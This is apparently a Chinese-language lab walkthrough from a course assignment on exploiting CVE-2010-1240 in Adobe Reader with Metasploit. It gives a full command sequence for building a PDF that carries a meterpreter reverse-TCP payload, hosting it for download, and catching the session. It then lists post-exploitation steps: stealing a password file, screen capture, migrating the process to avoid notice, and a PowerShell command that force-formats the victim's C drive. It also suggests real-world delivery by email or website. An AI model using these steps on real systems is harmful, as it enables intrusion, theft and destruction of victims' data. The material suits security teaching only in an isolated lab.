由
本演示视频展示了如何通过向目标发送看似无害的 PDF 文件(实际上嵌入了 payload)来控制受害者的设备。该漏洞已以 CVE-2010-1240 公开。
一旦受害者使用 Adobe Reader 打开 PDF,并被我们诱骗同意安全弹窗,我们就能通过反向 TCP 连接获得连接其设备的 meterpreter 会话。那时,他们所有的数据以及当前的行为都在我们的监控之下。

首先,我们启动 MSFconsole,它提供一个命令行界面供我们访问 Metasploit 框架。
msfconsole
然后,搜索与我们的目标 Windows 平台和 Adobe PDF Reader 相匹配的 exploit,它将显示一整个可用于入侵受害者 Windows 机器并利用 Adobe PDF Reader 漏洞的 exploit 列表。
search type:exploit platform:windows adobe pdf
在这个攻击中,我们使用以下命令选择并加载模块 "adobe_pdf_embedded_exe",以实现劫持受害者的目标。
use exploit/windows/fileformat/adobe_pdf_embedded_exe
我们还可以使用 "info" 命令查看 exploit 的信息,如下所示:
info
然后,我们设置 payload 为反向 TCP 连接。我们还将使用 Meterpreter,它提供一个交互式 shell,方便我们通过插入和执行代码来使用各种功能,从而探索受害者的机器。
set payload windows/meterpreter/reverse_tcp
接着,我们将设置监听主机和端口。对于 LHOST,我们需要输入攻击机的 IP 地址,此处即我们的 Kali 机器的 IP 地址(10.0.2.4)*。
*附注:
同时,对于 LPORT,我们可以设置一个不常用的端口号。
# 查看 Kali 机器的 IP 地址
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
然后,我们将使用 INFILENAME* 标志设置输入的 PDF 基础文件。接下来,我们将文件名设置为能够吸引受害者兴趣以打开恶意 PDF 文件的名称。
*附注:
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
在输入 "exploit" 命令生成带 payload 的 PDF 之前,我们可以再次查看我们的选项。
# 接着我们可以显示信息或选项
show info | show options
exploit
一旦我们成功生成 PDF 文件,我们会将其移动到 /var/www/html 目录,这是我们 Kali 机器上用于托管 Web 应用服务器的目录,供受害者稍后下载该 PDF 文件。
注意:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
然后,为了设置监听器,我们将使用 "exploit/multi/handler"。同样,我们将设置 payload、LHOST、LPORT 与我们生成恶意 PDF 文件时定义的保持一致。然后运行 payload。
注意:
show info 或 show options 是可选的命令。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
在另一个终端中,我们检查 Apache 服务器的状态,确保它正在运行以托管我们放在 /var/www/html 中的 PDF 文件,供受害者下载。
service apache2 status
# 如果处于非活动状态,则启动服务
service apache2 start
在 Windows 机器上,打开任意浏览器(如 Chrome),输入我们 Kali 的 IP 地址(10.0.2.4)* 以访问 Kali 机器的 Web 应用服务器。
*注意: 请使用你自己的 Kali 机器的 IP 地址
然后,模拟用户保存目标 PDF 文件。
一旦受害者使用 Adobe Reader 8.1.2 打开该文件并接受安全提示信息,我们就可以在 Kali 机器上观察到已通过反向 TCP 连接建立了一个新会话。
在实际场景中, 我们会搭建一个网站放置内嵌 payload 的 PDF,或者通过电子邮件附件发送文件。
然后,我们可以远程访问受害者的机器,并在 meterpreter 会话中进一步执行我们想要的更多恶意行为。
help
pwd
ls
例如,如果存在名为 password.txt 的文件,我们可以执行 download password.txt 命令
download [文件夹名 | 文件名.扩展名]
当然,如果我们真的够邪恶,我们可以编写恶意脚本(植入后门)以保持与 Windows 机器的连接! 💀
# 在后台启动命令提示符
execute -f cmd.exe -H -i
# 在 Windows 上创建文件
echo "You have been hacked" > hack.txt
# 打开我们刚刚创建的 txt 文件
hack.txt
# 截取屏幕截图
screenshot
# 实时查看远程用户
screenshare
然而,攻击者可以通过在 meterpreter 会话中使用 migrate 模块将 meterpreter 进程迁移到其他进程,从而降低怀疑。
meterpreter> run post/windows/manage/migrate
此处,它会在受害者机器上自动生成一个新进程并迁移到其中。受害者可以删除被感染的 PDF 文件,完全不知晓进程已经转移到别处。
攻击者还可以使用命令提示符(cmd)或 PowerShell 在目标机器上创建恶意脚本,这些脚本能够使整个操作系统无法正常运作。
meterpreter> shell
# 启动 Windows PowerShell
powershell
#PowerShell 命令强制格式化 C 盘并清空。
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false